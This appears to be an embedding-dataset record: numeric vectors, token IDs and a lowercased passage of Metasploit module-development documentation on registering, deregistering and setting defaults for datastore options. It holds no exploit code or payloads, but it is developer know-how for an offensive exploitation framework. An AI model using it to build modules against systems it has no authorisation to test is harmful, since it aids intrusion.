0.06688154488801956, 0.030484532937407494, 0.0030490350909531116, -0.27759939432144165, 0.4075418710708618, 0.2755339741706848, -0.17790687084197998, 0.5054202079772949, 0.11805955320596695, 0.4714416563510895, -0.7841786742210388, 0.16472043097019196, 0.26085469126701355, 0.6366361975669861, 0.8535758852958679, 1.140321135520935, 0.360749214887619, -0.027975378558039665, 0.6663075089454651, -1.2132607698440552, 0.022289618849754333, 0.6848262548446655, 0.052594464272260666, -0.48136088252067566, -0.028696268796920776, 0.07146839052438736, -0.13387912511825562, 0.13773873448371887, -0.41994592547416687, -0.04517366364598274, 0.1272422820329666, 0.6129250526428223, 0.5413718223571777, -0.7004128098487854, 0.7716929316520691, -0.577749490737915, 0.44406795501708984, -0.26391124725341797, 0.39501914381980896, 0.06582171469926834, -0.3342547118663788, -0.7655572295188904, 0.3781937062740326, 0.6375347375869751, 0.5762567520141602, -0.1588871330022812, 0.561231255531311, -0.1879955381155014, 0.3128263056278229, 0.3754903972148895, 0.3816787898540497, -0.5128845572471619, -0.16894960403442383, -0.01950806938111782, -0.4870587885379791, -0.7601516246795654, 0.19495651125907898, 0.31258711218833923, -0.08914284408092499, 0.5529760122299194, -0.692440927028656, 0.4416898190975189, -0.4869725704193115, 0.5034250020980835, -0.524224579334259, -0.11801612377166748, 0.1623637080192566, 0.09099288284778595, -0.5494463443756104, 0.7699224352836609, -0.22582000494003296, 0.5121818780899048, 0.1943846493959427, 0.8845789432525635, 0.7591062188148499, 1.168405532836914, -0.25088587403297424, 0.049064505845308304, -0.5987169146537781, 0.00944142322987318, -0.6878922581672668, 0.19736012816429138, -0.05341530218720436, -0.7262566089630127, 0.017243389040231705, -0.21120639145374298, -0.34209221601486206, -0.5850008726119995, 0.08497051894664764, -0.5457602739334106, -0.28278249502182007, -0.05019771680235863, 0.25756436586380005, -0.510886549949646, -0.35243964195251465, 0.1596432626247406, -0.27696534991264343, 0.8434820771217346, -0.21530893445014954, -0.7213801741600037, -0.2664833068847656, 0.14718052744865417, -0.0800219178199768, 0.06990227848291397, -0.8844916224479675, 0.1356574147939682, 0.0390450656414032, -0.6597687005996704, -0.56522536277771, 0.33228549361228943, 0.3082851469516754, -0.22806163132190704, 0.4562968909740448, 0.18134760856628418, 0.19087231159210205, 0.5060039758682251, -0.06287632882595062, -0.3716680109500885, 0.10719570517539978, 0.4316662549972534, -0.3016456961631775, 0.7442859411239624, 0.6339269876480103, -0.5964810848236084, 0.615496814250946, -0.14769890904426575, 0.49575045704841614, 0.16087882220745087, -0.18820691108703613, -0.4100040793418884, 0.3867415189743042, -0.6039604544639587, -0.14756955206394196, -0.6302187442779541, -0.10039861500263214, -0.35297906398773193, -0.014347987249493599, -0.9529579281806946, 0.06808297336101532, -0.7204474806785583, 0.3975970447063446, -0.08386020362377167, 0.39762985706329346, -0.3732704520225525, 0.40466541051864624, 0.4357469975948334, -1.1540601253509521, 4.2255988121032715, 0.715258002281189, 0.4870133697986603, 0.6208322644233704, 0.1298244148492813, 0.81725013256073, 0.8384118676185608, -0.5659669041633606, 0.06751043349504471, -0.022603964433073997, 0.36703816056251526, -0.5669471025466919, 0.409368097782135, 0.4347803592681885, 0.10503968596458435, 0.2722786068916321, -0.6349545121192932, -0.17642027139663696, 0.29767316579818726, -0.7675455212593079, -1.0230504274368286, -0.015255368314683437, -0.1717609316110611, 0.5498210787773132, -0.0261980127543211, 0.6183674931526184, 0.31005334854125977, -1.1654236316680908, -0.0012769170571118593, -0.5123220682144165, 0.734325647354126, -0.34570062160491943, 0.5790565609931946, -0.12513045966625214, 0.03697407618165016, -0.04528908431529999, 0.28014272451400757, -0.2343207746744156, -0.44533491134643555, -0.044493116438388824, 0.5207591652870178, -0.39010074734687805, 0.09993686527013779, -0.1588820070028305, 0.15803170204162598, 0.6186946034431458, -0.4746500551700592, 0.727029025554657, 0.7018375992774963, -0.7906569242477417, 0.8662633299827576, 0.23239298164844513, 0.5776984691619873, 0.4510260224342346, -0.9914072751998901, 1.0287630558013916, 0.4068755507469177, -0.15863096714019775, -0.23994679749011993, -0.28537529706954956, 0.8110828399658203, -0.5037491917610168, 0.2733584940433502, 0.10204972326755524, -0.5449501276016235, 0.4104875326156616, -0.22838649153709412, 0.7575170397758484, 0.15687665343284607, 0.12795791029930115, -0.4136255383491516, -0.513563871383667, -0.302712619304657, -0.6572802066802979, 0.9620605707168579, -0.5829880833625793, -0.24654121696949005, 0.2135220468044281, 0.4601809084415436, -0.513858437538147, -0.3429975211620331, -0.5343800187110901, -0.4863715171813965, 0.13890084624290466, 0.48303231596946716, 0.9165210127830505, -0.25822722911834717, -0.929196834564209, 0.0771230161190033, 0.04247903823852539, 0.4045320153236389, 0.6288232207298279, -0.4057905077934265, -0.390251487493515, -0.1440514773130417 ]
[ 5724, 1005, 1010, 6270, 1033, 1007, 23569, 2368, 25438, 21369, 9289, 2135, 2023, 2097, 5787, 1996, 7953, 2000, 3563, 9804, 1012, 2005, 2742, 1010, 2065, 2017, 2215, 1996, 7953, 2000, 2022, 2593, 1523, 6207, 1524, 1010, 2030, 1523, 4589, 1524, 1010, 1998, 2498, 2842, 1010, 2059, 23569, 2368, 2819, 2003, 1996, 2028, 2005, 2017, 1012, 3642, 2742, 1024, 1001, 9804, 2024, 1024, 6207, 2030, 2846, 1010, 12398, 2015, 2000, 6207, 23569, 2368, 2819, 1012, 2047, 1006, 1005, 5909, 1005, 1010, 1031, 2995, 1010, 1005, 2275, 1037, 5909, 1005, 1010, 1005, 6207, 1005, 1010, 1031, 1005, 6207, 1005, 1010, 1005, 4589, 1005, 1033, 1033, 1007, 23569, 18447, 15222, 2015, 2064, 2022, 2593, 1037, 2002, 2595, 3643, 1010, 2030, 26066, 1012, 23569, 18447, 1012, 2047, 1006, 1005, 5371, 1005, 1010, 1031, 2995, 1010, 1005, 1037, 2002, 2595, 2030, 26066, 1005, 1010, 9402, 2549, 1033, 1007, 23569, 15069, 10128, 2115, 2951, 23809, 2063, 5724, 2003, 4851, 2005, 1037, 2334, 5371, 4130, 1010, 2059, 2224, 2023, 1012, 23569, 15069, 1012, 2047, 1006, 1005, 5371, 1005, 1010, 1031, 2995, 1010, 1005, 7170, 1037, 2334, 5371, 1005, 1033, 1007, 23569, 6442, 29278, 2019, 7953, 2008, 1521, 1055, 3214, 2000, 2022, 2109, 2004, 1037, 3417, 2193, 1012, 2023, 2193, 2323, 2022, 2090, 1014, 1011, 3515, 22275, 2629, 1012, 3642, 2742, 1024, 23569, 6442, 1012, 2047, 1006, 1005, 1054, 6442, 1005, 1010, 1031, 2995, 1010, 1005, 2275, 1037, 3417, 1005, 1010, 2538, 1033, 1007, 23569, 2527, 9148, 2102, 2941, 4972, 3599, 1996, 2168, 2004, 23569, 3367, 4892, 1012, 23569, 2890, 3351, 2595, 17299, 6790, 23809, 2063, 5724, 2003, 1037, 3180, 3670, 1012, 23569, 2890, 3351, 2595, 2361, 1012, 2047, 1006, 1005, 5418, 1005, 1010, 1031, 2995, 1010, 1005, 2674, 1037, 2171, 1005, 1010, 1005, 1034, 7344, 1005, 1033, 1007, 1010, 2060, 4127, 1024, 1999, 2070, 3572, 1010, 2045, 2453, 2025, 2022, 1037, 2092, 1011, 10897, 2951, 23809, 2063, 5724, 2828, 2005, 2017, 1012, 1996, 2190, 2742, 2003, 2019, 24471, 2140, 1024, 2130, 2295, 2045, 1521, 1055, 2053, 2107, 2518, 2004, 1037, 23569, 3126, 2140, 1010, 2054, 2017, 2064, 2079, 2003, 2224, 1996, 23569, 3367, 4892, 2828, 1010, 1998, 2059, 1999, 2115, 11336, 1010, 2079, 2070, 27354, 2005, 2009, 1010, 2066, 2023, 1024, 13366, 9398, 1029, 1006, 7953, 1007, 2065, 7953, 1027, 1066, 1013, 1034, 8299, 1024, 1032, 1013, 1032, 1013, 1012, 1009, 1013, 1045, 2709, 2995, 2842, 1001, 2182, 2017, 2064, 5136, 6274, 5724, 10175, 8524, 17389, 18933, 2099, 2709, 6270, 2203, 2203, 2065, 9398, 1029, 1006, 2951, 23809, 2063, 1031, 1005, 24471, 2140, 1005, 1033, 1007, 1001, 2057, 2064, 2079, 2242, 2007, 1996, 24471, 2140, 2842, 1001, 2025, 1996, 4289, 2057, 1005, 2128, 2559, 2005, 1012, 10214, 2000, 2079, 2505, 1012, 2203, 23569, 3367, 4892, 27086, 2135, 2005, 1037, 5164, 5724, 1012, 2065, 1996, 7953, 4269, 2007, 1523, 5371, 1024, 1013, 1013, 1524, 1010, 23569, 3367, 4892, 2097, 2036, 8073, 7868, 2023, 2003, 1037, 5371, 1010, 1998, 3191, 2013, 2009, 1012, 2174, 1010, 2045, 2003, 2053, 5371, 4130, 27354, 2043, 2023, 6433, 1010, 2061, 2065, 2017, 2215, 2000, 7170, 1037, 5371, 1010, 2017, 2323, 2224, 1996, 23569, 15069, 2612 ]
metasploit
116.txt
3
, and then read the file yourself. code example : optstring. new ('mytest ', [ true,'set a mytest option ','this is a default value'] ) registering and deregistering module options the register _ options methodthe register _ options method can register multiple basic datastore options. basic datastore options are the ones that either must be configured, such as the rhost option in a server - side exploit. or it ’ s very commonly used, such as various username / password options found in a login module. the following is an example of registering multiple datastore options in a module : register _ options ( [ optstring. new ('subject ', [ true,'set a subject'] ), optstring. new ('message ', [ true,'set a message'] ) ] ) the register _ advanced _ options methodthe register _ advanced _ options method can register multiple advanced datastore options. advanced datastore options are the ones that never require the user to configure before using the module. for example, the proxies option is almost always considered as β€œ advanced ”. but of course, it can also mean that ’ s something that most user will find difficult to configure. an example of register an advanced option : register _ advanced _ options ( [ optint. new ('timeout ', [ true,'set a timeout, in seconds ', 60 ] ) ] ) the deregister _ options methodthe deregister _ options method can deregister either basic or advanced options. usage is really straight - forward : deregister _ options ('option1 ','option2 ','option3') changing the default value for a datastore optionwhen a datastore option is already registered by a mixin, there are still ways to change the default value from the module. you can either use the register _ options method, or adding a defaultoptions key in the module ’ s metadata. using the defaultoptions key is preferred because the option ’ s description and other attributes will remain unchanged. using register _ options to change the default valueone of the advantages of using register _ options is that if the datastore option is advanced, this allows it to be on the basic option menu, meaning when people do β€œ show options ” on msfconsole, that option will be there instead. you also
[ -0.39862191677093506, -0.4633125066757202, 0.7107766270637512, 0.1428382843732834, -0.7871661186218262, -0.5680044889450073, 0.24669209122657776, -0.13985906541347504, 0.215330570936203, 0.718141496181488, 0.2395412176847458, -0.15656116604804993, 0.49781039357185364, -0.15885238349437714, -0.8933776617050171, 0.027882220223546028, -0.6037620306015015, -0.04253337159752846, -0.9926366209983826, 0.4849119782447815, 0.31557321548461914, -0.0012103902408853173, -0.7694907188415527, -0.6210371851921082, -0.3187866508960724, 0.5903052687644958, 0.3651384115219116, 0.5112156867980957, -0.06598591059446335, 0.6404590606689453, 0.5219476819038391, 0.14932245016098022, 0.08955561369657516, -0.764197051525116, 0.15752571821212769, 0.1013229712843895, 0.8669173717498779, -0.7808574438095093, 0.15066035091876984, -0.4271545112133026, 0.6012303233146667, -0.38820910453796387, 0.3083791732788086, -0.9431146383285522, -0.31957918405532837, -0.3576010465621948, 0.2658216953277588, -0.30794861912727356, 0.37927672266960144, 0.10488658398389816, 0.328671932220459, -0.2817235589027405, 0.7222581505775452, -0.01858397200703621, 0.04078236222267151, -0.18528348207473755, 0.050104379653930664, -0.22189073264598846, -0.042407624423503876, 0.254400372505188, -0.18703196942806244, 0.29415687918663025, 0.6395196914672852, -0.7290340065956116, 0.02811259962618351, -0.24265170097351074, 0.22752149403095245, -0.0022760957945138216, -0.3448815643787384, -0.8085731863975525, 0.26356008648872375, 0.17321442067623138, -0.38090088963508606, -0.6647910475730896, -0.43499717116355896, -0.27604997158050537, -0.1371263861656189, -0.08304180949926376, -0.3385258913040161, 0.3896554112434387, 0.36373797059059143, 0.11967772245407104, 0.3253374397754669, -0.28811272978782654, -0.1747553050518036, -0.13625116646289825, 0.1084257960319519, 0.909314751625061, -0.29061439633369446, 0.021700141951441765, 0.2862139344215393, 0.03993450477719307, -0.5744307041168213, -0.6807486414909363, 1.281944751739502, 0.18188722431659698, 0.09394186735153198, 0.33994677662849426, -0.03556887060403824, 0.15908125042915344, 0.5524176955223083, 0.9069231152534485, 0.11589949578046799, 0.13401052355766296, 0.04796319082379341, 1.064602017402649, -0.13252143561840057, 0.21885904669761658, -0.2901626229286194, -0.32951927185058594, 0.2596784234046936, -0.4606572091579437, 0.3394780457019806, -0.6387290954589844, -0.14152193069458008, 0.6682389974594116, -0.12553679943084717, 0.20744386315345764, -0.2247774749994278, 0.3177294433116913, -0.4234476685523987, 0.23737730085849762, -0.38550376892089844, -0.18281224370002747, 0.0855770856142044, -0.14405597746372223, -0.07461166381835938, 0.21886692941188812, -0.34638428688049316, -0.4943560063838959, -0.10123168677091599, 0.31046926975250244, -0.3021577298641205, 0.7721777558326721, -0.2662857174873352, 0.571360170841217, 0.1640000194311142, 0.7142727971076965, 0.5023282766342163, -1.0322232246398926, -0.049770668148994446, 0.4443870782852173, 0.4240126609802246, 1.5339361429214478, 0.19093573093414307, -0.33483994007110596, 0.033444929867982864, 0.07187190651893616, -0.7805080413818359, 0.21482275426387787, -0.19290180504322052, -0.09538526087999344, 0.21444278955459595, -0.12007427215576172, -0.952242374420166, 0.14857615530490875, -0.8411086201667786, 0.7100434899330139, -0.03440649434924126, -0.3345414698123932, -0.38161569833755493, 0.7155362963676453, 0.32087403535842896, 0.08557786792516708, 0.0010764258913695812, 0.30723851919174194, -0.39619600772857666, -0.5269488096237183, -0.2983671724796295, -0.048888932913541794, -0.08155862987041473, 0.14836257696151733, -0.014831329695880413, -0.019582822918891907, 1.2157455682754517, 0.7958415150642395, 0.34575995802879333, -0.18388552963733673, 0.08995242416858673, 0.3630068004131317, -0.4662025570869446, 0.46134841442108154, 0.36782926321029663, 0.3594350814819336, -0.22306224703788757, 0.15104928612709045, -0.47807177901268005, -0.3532841205596924, -0.13742759823799133, 0.11549517512321472, -0.16206242144107819, 0.3503626883029938, -0.3914411664009094, 0.2039990872144699, 0.34146779775619507, 0.2164585292339325, -1.01137113571167, 0.3276985287666321, -0.24162408709526062, -1.192651391029358, -0.2518461346626282, 0.02412359043955803, 0.21239124238491058, 0.6586034893989563, 0.07195761799812317, -0.5855593085289001, 0.9366466999053955, 0.7615247964859009, -0.10718131065368652, 0.637445330619812, 0.750220775604248, -0.28852710127830505, -0.09728824347257614, 0.6371046304702759, 0.22291231155395508, -0.3715580105781555, -0.46574339270591736, 0.33558857440948486, -0.6145976185798645, 0.021858643740415573, 0.13369448482990265, 0.5879952907562256, 0.5667977929115295, 0.19461630284786224, -0.30329596996307373, -0.31225135922431946, 0.31117814779281616, 0.5556837916374207, -0.18973104655742645, -0.19815224409103394, -0.18014086782932281, 0.5589584708213806, 0.5472490191459656, 0.9197391867637634, 0.2343420386314392, -0.19195041060447693, 0.40274712443351746, 0.10217248648405075, 0.19111590087413788, 0.3157481253147125, -0.647126317024231, 0.4872744381427765, 0.8390858173370361, 0.5851666331291199, 0.2834279239177704, 0.5259803533554077, 0.033378854393959045, -0.3513416051864624, 0.24257341027259827, 0.13940240442752838, -0.1733974814414978, 1.0728602409362793, 0.27996957302093506, -0.4933999180793762, -0.7780112028121948, -0.46117228269577026, 0.22417813539505005, 0.16773352026939392, -0.3826286792755127, -0.8108940720558167, -0.0456383191049099, -0.013793918304145336, -0.2905125021934509, -0.1927371472120285, 0.036144111305475235, 0.13778741657733917, 0.1367979794740677, -0.14096014201641083, -0.19583021104335785, -0.7779765725135803, -0.8427169322967529, -0.26801925897598267, -0.5627309679985046, 0.15235179662704468, -0.25841301679611206, 0.3696507513523102, 0.19015882909297943, -0.4457453489303589, 0.7562485337257385, -0.19261547923088074, -0.4903324544429779, 0.22709904611110687, -0.5043296813964844, 0.42582863569259644, -0.20965178310871124, -0.4554611146450043, -0.3352194130420685, 0.34690940380096436, -0.2443075180053711, 0.7534948587417603, -0.21269148588180542, -0.3879361152648926, -0.2198864370584488, -0.0972038134932518, 0.14918506145477295, 0.17353393137454987, 0.7248409390449524, -0.056541912257671356, -0.06534908711910248, -0.3511929512023926, -0.7713645696640015, 0.014806660823523998, 0.11186785995960236, 0.165859654545784, -0.41452956199645996, 0.35720932483673096, -0.04459013789892197, -0.29111066460609436, 0.585308849811554, 0.5656331181526184, -0.4641568064689636, 0.2835882902145386, 0.44332996010780334, 0.5963956117630005, -0.8743967413902283, 0.33687925338745117, 0.08892033249139786, 0.26048529148101807, 0.34617477655410767, -0.12255328893661499, -0.1644245982170105, -0.4929784834384918, -0.2057521641254425, -0.35648807883262634, -0.2669372856616974, 0.6637976765632629, -0.35861897468566895, -0.5432941317558289, 0.3828180134296417, -0.4356359541416168, -0.4970245659351349, -0.47847282886505127, 0.021962685510516167, 0.3258809745311737, -0.14800725877285004, 0.1273973286151886, -0.3972446322441101, -0.38413557410240173, 0.12546081840991974, 0.024226829409599304, 0.013357904739677906, -0.722358763217926, -0.08018302917480469, 0.17350824177265167, -0.6112517714500427, 0.4809032678604126, 0.04443453252315521, -0.6679095029830933, -0.17079582810401917, -0.5550569295883179, 0.49645721912384033, -0.2708592712879181, 0.22593727707862854, 0.4268908202648163, -0.020167775452136993, 0.6947798132896423, -0.1386595517396927, 0.20210227370262146, -0.20445849001407623, 0.14711853861808777, 0.6408306360244751, 0.4347744882106781, -0.02924010530114174, 0.25340384244918823, -0.543219804763794, -0.819537878036499, -0.45838865637779236, -0.26680636405944824, 0.5770363807678223, -0.1718636155128479, 0.6771391034126282, -0.21820056438446045, -0.22689484059810638, 0.562853991985321, -0.07412680983543396, 0.15579673647880554, 1.0334535837173462, -0.5168078541755676, 0.658939003944397, -0.1860020011663437, 0.01120296772569418, -0.3928706645965576, -0.3698607087135315, 0.1254606992006302, -0.10963253676891327, 0.24341830611228943, -0.24491213262081146, -0.5766372680664062, -0.1680818796157837, -0.3096577525138855, -0.278734028339386, 0.1809442788362503, 0.03948850929737091, -0.27598047256469727, -0.2757406532764435, -0.3334042429924011, 0.708655059337616, 0.24941836297512054, 0.218881756067276, 0.6167088747024536, 0.6116008758544922, 0.1541062593460083, 0.1921648383140564, 0.3798762857913971, -0.32902440428733826, 0.2643924653530121, 0.12206273525953293, 0.8920375108718872, -0.07979999482631683, 0.11272481828927994, -0.11880463361740112, 0.387285977602005, -0.8510572910308838, -0.3874130845069885, 0.16816368699073792, 0.53078293800354, -0.16034992039203644, -0.14079509675502777, 0.6878101825714111, 0.20149807631969452, -0.7208081483840942, 0.07800453901290894, -0.21297669410705566, 0.3233611285686493, 0.4455511271953583, -0.6003790497779846, 0.1251784712076187, -0.47878527641296387, 0.10045358538627625, -0.32176321744918823, 0.35454127192497253, -0.34294962882995605, -0.7098654508590698, -0.13613580167293549, -0.3435440957546234, -0.2851009666919708, 0.23080989718437195, -0.28306588530540466, 0.18772470951080322, -0.9448572993278503, 0.054037805646657944, 0.3062075674533844, -0.5667811036109924, -0.21719634532928467, 0.17122487723827362, 0.3973195254802704, -0.16543415188789368, 0.13801251351833344, -0.4841628968715668, -0.33449384570121765, 0.45551344752311707, -0.49811550974845886, 0.3474843502044678, -0.8856386542320251, 0.4640301465988159, 0.4671246111392975, 0.09465266764163971, -0.48000818490982056, -0.03878336027264595, -0.5695174932479858, -0.16356761753559113, 0.21868106722831726, -0.054153960198163986, -0.20077550411224365, 0.057178646326065063, 0.8702855110168457, -0.40339574217796326, -0.8019340634346008, 0.27134260535240173, 0.5281774401664734, 0.5682721138000488, 0.04867129772901535, -0.27533310651779175, -0.4644732177257538, 0.486422598361969, -1.0299432277679443, 0.47235527634620667, -0.4224647283554077, 0.017608139663934708, -0.011655169539153576, -0.4776901304721832, 0.908260703086853, -0.10863473266363144, 0.2862819731235504, -0.06938288360834122, -0.49396613240242004, -0.124954454600811, 0.3512345850467682, -0.14713682234287262, 0.04252440854907036, -0.1975657045841217, -0.4181171655654907, -0.3669288456439972, -0.2610069811344147, -0.5983265042304993, -0.39436718821525574, -0.4428535997867584, -0.3147457540035248, 0.23470942676067352, 0.039567384868860245, 0.42769569158554077, 0.2136763632297516, -0.47343578934669495, 0.46093419194221497, 0.07928085327148438, 0.4861869215965271, -1.0755999088287354, -0.062070563435554504, -0.45356661081314087, 0.45937028527259827, -0.19885841012001038, 0.010124284774065018, -0.24103790521621704, -0.17660367488861084, 0.03997087478637695, 0.1685006320476532, 0.6474400758743286, -0.400423139333725, 0.16522382199764252, 0.9031386375427246, -0.15933045744895935, -0.31328874826431274, -0.03432665765285492, 0.6129751801490784, -0.6165022253990173, 0.45853063464164734, -0.38306087255477905, -0.3346911072731018, -0.7896395325660706, -0.5675869584083557, -0.22886237502098083, -0.49784770607948303, 0.35527390241622925, -0.7025554776191711, 0.09735386818647385, -0.5289599895477295, 0.3665510416030884, 0.08664996176958084, -0.47017067670822144, -0.1861083060503006, 0.060124460607767105, -0.07213371247053146, 0.4307419955730438, 0.0837121307849884, -0.04020288586616516, -0.7542093992233276, -0.4895883798599243, 0.8314223289489746, 0.060845889151096344, 0.26873093843460083, 0.4047037959098816, 0.10708227008581161, 0.325979083776474, 0.0014747960958629847, -0.7799628973007202, 0.31149592995643616, 0.037605948746204376, 0.060613684356212616, -0.5804789066314697, 0.43040063977241516, -0.4747946858406067, 0.13448947668075562, -0.4176557660102844, 0.08410041779279709, 0.1682654768228531, -0.2870040535926819, 0.5208396911621094, 0.019553080201148987, 0.9465338587760925, -0.8372663259506226, -0.34962165355682373, -0.46155229210853577, 0.9290580749511719, 0.4993646740913391, -0.41700685024261475, -0.5977075695991516, -0.43262404203414917, -0.4176803529262543, -0.6022112369537354, 0.632576584815979, -0.04131494462490082, 0.14397583901882172, 0.3363288640975952, -0.09152331948280334, 0.8390079140663147, -0.36969053745269775, -0.10046444088220596, 0.97822505235672, 0.3315367102622986, 0.25301507115364075, -0.3070703148841858, 0.035155825316905975, 0.13720518350601196, -0.3888189494609833, 0.4714493453502655, -0.16883021593093872, -0.763367235660553, -0.019475558772683144, -0.30955636501312256, -0.46080055832862854, -0.30390310287475586, -0.15447616577148438, 0.5262153148651123, 0.1768757700920105, 0.5735110640525818, -0.049102310091257095, -0.5562751889228821, -0.5184670686721802, 0.4186567962169647, 0.018188172951340675, -0.20382055640220642, 0.5932218432426453, -0.333681583404541, 0.360267698764801, 0.16547609865665436, 0.06748206913471222, 0.3920357823371887, -0.3961106836795807, 0.4552455246448517, -0.026563793420791626, -0.030357301235198975, 0.1614198237657547, 0.5899405479431152, -1.1842820644378662, -0.1464361548423767, -0.6505141854286194, -0.6319112777709961, 0.5975484848022461, -0.5206733345985413, -0.6273710131645203, 0.2461424022912979, -0.2637297511100769, 0.012791537679731846, 0.35169824957847595, 0.25736069679260254, 0.597846508026123, -0.6848602294921875, 0.2314607799053192, -0.08112575858831406, 0.3768974244594574, 0.5444457530975342, -0.7850888967514038, -0.10120980441570282, -0.8200137615203857, 0.21268205344676971, 0.1758936494588852, 0.27582642436027527, 0.9729403853416443, -0.1130257174372673, 0.2061438411474228, 0.10956715047359467, 0.20894943177700043, 0.7908484935760498, 0.42526257038116455, 0.03165269270539284, 0.7242173552513123, -0.18071381747722626, -0.9900878667831421, -0.1895458698272705, -0.04018503427505493, 0.001894925837405026, 0.623124897480011, -0.34413349628448486, -0.06760425865650177, 0.2383037656545639, 0.43329235911369324, 0.06225109100341797, -0.3915395736694336, -1.131544828414917, -0.8402740359306335, 0.05202575773000717, -0.008388363756239414, -0.5365367531776428, -0.0045501166023314, 0.4008685350418091, -0.2214215248823166, -0.48839879035949707, -0.5574561953544617, 0.9699094891548157, -0.5279009938240051, 0.7910069227218628, -0.046641066670417786, 0.057585541158914566, -0.8918338418006897, 0.04484110325574875, -0.47810477018356323, -0.2652885615825653, -0.5088388323783875, -0.5389136075973511, -0.39095622301101685, 0.32675328850746155, -0.5061051249504089, 0.25098317861557007, -0.6579750776290894, 0.27481210231781006, -0.1307068169116974, -0.6684346199035645, 0.2804313600063324, -0.0000821624489617534, -0.1763630211353302, -0.05950359255075455, 0.3239476680755615, -0.005186415743082762, 0.09978082031011581, -0.5849269032478333, -0.27884936332702637, 0.11004932969808578, -0.12886802852153778, 0.3385598063468933, 0.11043546348810196, -0.21877333521842957, -0.07750926911830902, 0.16381773352622986, -0.41661038994789124, -0.03948748856782913, -0.7112945318222046, -0.1196591928601265, -0.10167770832777023, -0.7524760365486145, 0.42607513070106506, 1.0523858070373535, 0.06549934297800064, 0.41851723194122314, -0.3366631865501404, -0.03908243402838707, -0.12521657347679138, -0.11489041894674301, -0.06635293364524841, 0.9935203194618225, 0.20900025963783264, -0.8058616518974304, -0.28228628635406494, -0.14733648300170898, -0.39065679907798767, 0.28458571434020996, 0.13199685513973236, -0.21020568907260895, -0.7072478532791138, 0.3653128147125244, 0.23220676183700562, 0.5538169741630554, 0.6499781608581543, -0.6097501516342163, 0.22790473699569702, -0.6953346133232117, -0.520259439945221, -0.12644217908382416, -0.5709412693977356, -0.19393061101436615, -0.030670534819364548, -0.11007750779390335, -0.33898672461509705, -0.8332464694976807, -0.32642072439193726, 0.24257002770900726, 0.2192012518644333, -0.2568204998970032, -0.041769009083509445, 0.07988297939300537, -0.5766417980194092, 1.0545785427093506, -0.07744468748569489, -0.2743138372898102, 0.30510181188583374, 0.040641460567712784, -0.6486925482749939, -0.7059953808784485, 0.2643906772136688, 0.4392324984073639, 0.12918837368488312, -0.2186615914106369, -0.44440075755119324, -0.3106822967529297, -0.1502068042755127, -0.1139601543545723, 0.22267434000968933, 0.08540740609169006, -0.0324288010597229, 0.645155668258667, -0.6964208483695984, -0.0151860686019063, 0.24338369071483612, -0.01634918712079525, 0.6521578431129456, -0.2767677903175354, -0.43475794792175293, 0.548457682132721, 0.11891967803239822, -0.17927250266075134, 0.47226089239120483, 0.10179673880338669, 0.3579133450984955, 0.2829795479774475, -0.2782417833805084, -0.4933225214481354, -0.08865617215633392, 0.7170229554176331, 0.3062160015106201, 0.039910197257995605, 0.18727603554725647, 0.589698314666748, -0.3670510947704315, 0.5042847990989685, 0.21443183720111847, -0.14599472284317017, -0.3106957972049713, 0.09702037274837494, -0.14458158612251282, -0.5219771265983582, 0.07291162759065628, -0.19337953627109528, 0.25711873173713684, -0.17266437411308289, 0.452008455991745, 0.11917443573474884, -0.23213353753089905, 0.9131324887275696, -0.6695456504821777, 0.5463375449180603, -0.20925326645374298, 0.12086521089076996, 0.1815546751022339, -0.22534097731113434, -0.2210301160812378, 0.3737240731716156, 1.1574143171310425, 0.7434396743774414, -0.2829832136631012, 0.4245050251483917, 0.1294000744819641, 0.47506240010261536, 0.12167854607105255, 0.1314842402935028, -0.2517295181751251, 0.3863040506839752, 0.07777963578701019, -0.9988365173339844, -0.34499886631965637, -0.03562886640429497, 0.23129944503307343, 0.30922964215278625, 0.6882044672966003, -0.010115266777575016, 0.5386569499969482, -0.500342071056366, -0.02176177129149437, 0.02885454334318638, 0.3443133533000946, 0.34490230679512024, 0.35532286763191223, -0.46308568120002747, 0.6061387658119202, -0.12955161929130554, 0.8391174674034119, 0.49012207984924316, 0.7439020872116089, 0.3866354525089264, 0.28714632987976074, 0.3381459414958954, -0.2493806779384613, -0.9745416641235352, 0.2512008249759674, 0.07204277068376541, -0.2030513435602188, 0.7730066180229187, -0.24266694486141205, 0.25507521629333496, -0.08510495722293854, -0.31465646624565125, -0.49918267130851746, -0.040116701275110245, 0.2864849865436554, 0.1570439338684082, 0.3814154863357544, -0.07068376988172531, -0.7990200519561768, -0.19054923951625824, -0.08656875789165497, 0.09225891530513763, 0.4191189110279083, -0.2424323558807373, -0.5779631733894348, -0.28807640075683594, -0.07478183507919312, -0.11282488703727722, 0.636223554611206, 0.1405927985906601, -0.07643397152423859, -0.04690445214509964, -1.0256304740905762, -0.4566705822944641, 0.16616390645503998, -0.42946121096611023, -0.646497905254364, 0.7354892492294312, 0.20588979125022888, 0.7910231947898865, 0.3455720543861389, -0.3875369727611542, -0.3061668872833252, 0.126336470246315, 0.3185330629348755, -0.30668824911117554, 0.8264662623405457, 0.4745416045188904, 0.06796809285879135, 0.591989278793335, 0.18190674483776093, 0.2907531261444092, -0.13646000623703003, -0.39119425415992737, -0.09041687101125717, -0.17140920460224152, -0.08783489465713501, -0.412793904542923, -0.20645970106124878, -0.3449998199939728, 0.3056921362876892, -0.20347166061401367, -1.197015404701233, -0.20298664271831512, -0.4436222016811371, 0.1422862857580185, -0.530987024307251, 0.6151554584503174, -0.06911040097475052, 0.21732109785079956, 0.7324849367141724, -1.2346744537353516, 4.702788352966309, 0.4420003592967987, 0.05391637235879898, -0.22789694368839264, -0.2318161427974701, 0.7282167077064514, 0.8377041816711426, -0.793879508972168, 0.45065659284591675, -0.1272553950548172, 0.4038030505180359, -0.043553099036216736, 0.057562973350286484, 0.35698556900024414, 0.11547348648309708, 0.267340749502182, -0.8660482168197632, -0.11691015213727951, -0.09073856472969055, -1.1069875955581665, -0.6075522303581238, 0.293550580739975, -0.08220309764146805, 0.7284067869186401, 0.1143687292933464, -0.3083198070526123, 0.5136466026306152, -1.0846312046051025, 0.12021388113498688, -0.3678220212459564, 0.16889645159244537, -0.43236392736434937, 0.15896543860435486, -0.1328892558813095, -0.5870083570480347, -0.180230513215065, 0.21322885155677795, -0.31892046332359314, -0.3013324737548828, 0.12254822999238968, 0.13930919766426086, 0.1160537526011467, -0.07143604755401611, -0.48971545696258545, -0.017160959541797638, 0.4480215311050415, -0.7758906483650208, 0.5338614583015442, 0.7509273290634155, -0.7872198224067688, 0.7267332673072815, -0.01585964858531952, 0.7977901697158813, -0.15884923934936523, -0.8472796678543091, 0.49481090903282166, 0.9300816655158997, -0.4718087315559387, -0.16655229032039642, -0.017596064135432243, 0.41443634033203125, -0.3277685344219208, 0.5766482949256897, -0.42311933636665344, 